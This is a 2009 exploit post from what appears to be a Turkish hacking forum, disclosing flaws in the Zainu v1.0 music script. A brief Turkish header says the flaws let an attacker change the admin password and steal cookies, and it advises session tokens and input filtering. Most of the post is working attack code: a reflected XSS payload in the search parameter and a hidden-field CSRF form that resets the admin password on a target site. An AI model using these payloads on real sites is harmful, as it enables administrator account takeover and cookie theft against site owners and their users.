Zainu v1.0 XSRF ~ XSS Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Zainu v1.0 XSRF ~ XSS Vuln.

Madde
	Author : Bug Researchers/CWCaspeR
	Date : 04.11.2009 23:24:27
	# Zainu v1.0 XSRF ~ XSS Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : Zainu v1.0 # vulnerable Type : XSRF - XSS # Infection : Admin sifresi degistirilebilir ..! cookieler çalinabilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! - zararli karakterler filtrelenmelidir. # Demo : http://www.zainu.com/demo/ # author : CWCaspeR ~ Bug Researchers ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > [XSS] /index.php?searchSongKeyword=><script>alert(’CaspeR’)</script> [XSRF] <form action=http://hedefsite.com/process.php method=post> <input type=hidden name=action value=Admin/password> <input class=input type=hidden name=password value=NEWpassWORD> <input class=input type=hidden name=retype_password value=NEWpassWORD> <input class=but type=submit value=BUTONADI> </form> < -- bug code end of -- >